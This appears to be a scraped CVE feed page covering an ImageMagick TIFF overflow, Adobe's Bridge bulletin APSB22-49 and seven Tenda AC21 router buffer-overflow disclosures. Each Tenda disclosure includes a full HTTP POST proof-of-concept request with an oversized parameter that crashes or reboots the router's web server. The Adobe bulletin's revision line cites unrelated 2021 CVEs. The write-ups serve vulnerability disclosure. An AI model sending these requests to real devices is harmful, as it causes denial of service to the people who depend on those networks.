A heap buffer overflow issue was found in ImageMagick. When an application processes a malformed TIFF file, it could lead to undefined behavior or a crash causing a denial of service.

'2126824?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-3213: Invalid Bug ID

Adobe Bridge version 12.0.2 (and earlier) and 11.1.3 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Updates Available for Adobe Bridge | APSB22-49

Bulletin ID

Date Published

Priority

APSB22-49

September 13, 2022  

3

**Summary**

Adobe has released a security update for Adobe Bridge. This update addresses critical and important vulnerabilities that could lead to arbitrary code execution and memory leak.

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe Bridge    

12.0.2 and earlier versions   

Windows  and macOS

Adobe Bridge    

11.1.3 and earlier versions 

Windows  and macOS  

**Solution**

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app's update mechanism.  For more information, please reference this help page.   

Product

Version

Platform

Priority     

Availability      

Adobe Bridge    

12.0.3

Windows and macOS    

3

Download Page    

Adobe Bridge    

11.1.4   

Windows and macOS      

3

Download Page      

**Vulnerability details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**  

**CVSS vector**

CVE Numbers

Out-of-bounds Write (CWE-787)  

Arbitrary code execution

Critical   

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-35699

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-35700

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical   

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35701  

Out-of-bounds Read (CWE-125)

Arbitrary code execution  

Critical   

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35702  

Out-of-bounds Read (CWE-125)

Arbitrary code execution  

Critical    

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35703  

Use After Free (CWE-416)  

Arbitrary code execution  

Critical    

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35704  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35705  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35706  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35707  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35708  

Use After Free (CWE-416)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-35709  

Use After Free (CWE-416)  

Memory leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-38425  

**Acknowledgments**

Adobe would like to thank the following researcher for reporting this issue and for working with Adobe to help protect our customers:    

*   Mat Powell of Trend Micro Zero Day Initiative - CVE-2022-35699, CVE-2022-35700, CVE-2022-35701, CVE-2022-35702, CVE-2022-35703, CVE-2022-35704, CVE-2022-35705, CVE-2022-35706, CVE-2022-35707, CVE-2022-35708, CVE-2022-35709, CVE-2022-38425
    

**Revisions**

December 6th, 2021: Added CVE details for CVE-2021-44185, CVE-2021-44186, CVE-2021-44187   

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com

CVE-2022-35699: Adobe Security Bulletin

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, form_fast_setting_wifi_set.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionform_fast_setting_wifi_set

In this function, it calls sub_441F30(a1) and the vulnerability is in sub_441F30

In sub_441F30() , it calls sscanfto read strings in v5 which we can control through POST parameter timeZone. It doesn’t check the length of v5, and the v8, v9 is on the stack, so there is a stack overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/fast_setting_wifi_set HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 484
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9865714904007963&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close
    
    ssid=1&timeZone=1:1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-40075: Vuln/Tenda AC21/1 at main · xxy1126/Vuln

Tenda AC21 V16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: fromSetWifiGusetBasic.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionfromSetWifiGusetBasic

Attacker can use this vulnerability via theshareSpeed parameter.

it calls strcpy(v12, v7) and v12 is on the stack, so there is a stack buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/WifiGuestSet HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 23
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9865714904007963&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close
    
    shareSpeed=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can cause httpd reboot.

CVE-2022-40076: Vuln/Tenda AC21/4 at main · xxy1126/Vuln

Tenda AC21 V16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: formSetQosBand.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionformSetQosBand

Attackers can cause this vulnerability via parameter list

In function formSetQosBand, it calls set_qosMib_list and pass v2 to it.

In function set_qosMib_list, it calls strcpy(v8, s), v8 is on the stack, so there is a buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetNetControlList HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 879
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.08852963756997312&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07aduufcvb
    Connection: close
    
    list=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can makehttpd reboot

CVE-2022-40068: Vuln/Tenda AC21/10 at main · xxy1126/Vuln

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: formSetVirtualSer.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionformSetVirtualSer

Attackers can cause this vulnerability via parameter list

In function formSetVirtualSer, it calls save_virtualser_data and vulnerability is in this function.

In function save_virtualser_data , it calls sscanf to read strings in v9(a2) to parameter on the stack without checking its length , so there is a buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetVirtualServerCfg HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 160
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.278922737111333&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07adfmbcvb
    Connection: close
    
    list=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can makehttpd reboot

CVE-2022-40067: Vuln/Tenda AC21/9 at main · xxy1126/Vuln

]Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: fromSetSysTime.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionfromSetSysTime

In function fromSetSysTime, it calls sub_496104(a1), the vulnerability is in this function.

In sub_496104(a1), it calls sscanf() and the v6, v7 is on the stack, so there is a buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetSysTimeCfg HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 754
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07adhyecvb
    Connection: close
    
    timeType=sync&timeZone=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111%3A11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-40069: Vuln/Tenda AC21/6 at main · xxy1126/Vuln

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: setSmartPowerManagement.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionsetSmartPowerManagement

Attackers can cause this vulnerability via parameter time

the sscanf function read string from s, and pass to v10 which is on the stack without checking its length, so there is a buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/PowerSaveSet HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 1087
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9241437684734013&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07adqtucvb
    Connection: close
    
    nptr=0&powerSaveDelay=0&ledCloseType=0&time=11:11-11:11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can makehttpd reboot

CVE-2022-40072: Vuln/Tenda AC21/7 at main · xxy1126/Vuln

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, setSchedWifi.

**Tenda AC21(V16.03.08.15) contains heap Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a heap overflow vulnerability in file /bin/httpd, functionsetSchedWifi  .

This vulnerability allows attackers to cause a Denial of Service (DoS) via the schedStartTimeand  schedEndTimeparameter.

the strcpy(ptr+2, v8) and strcpy(ptr+10, v7) copies strings to heap buffer without checking its length, so there is a heap overflow.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/openSchedWifi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 224
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9865714904007963&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close
    
    schedStartTime=1111111111111111111111111111111111111111111111111111111111111111111111111111111&schedEndTime=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&schedWifiEnable=1&timeType=1
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-40074: Vuln/Tenda AC21/3 at main · xxy1126/Vuln

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, saveParentControlInfo.

**Tenda AC21(V16.03.08.15) contains stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionsaveParentControlInfo  .

This vulnerability allows attackers to cause a Denial of Service (DoS) via the time parameter.

In function saveParentControlInfo, it calls compare_parentcontrol_time(a1), the vulnerability is in this function.

It calls sscanf(s, “%[^-]-%s”, v3, v4) and v4 is on the stack, so there is a buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 137
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07adwfrcvb
    Connection: close
    
    time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%2daaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

Tag

#buffer_overflow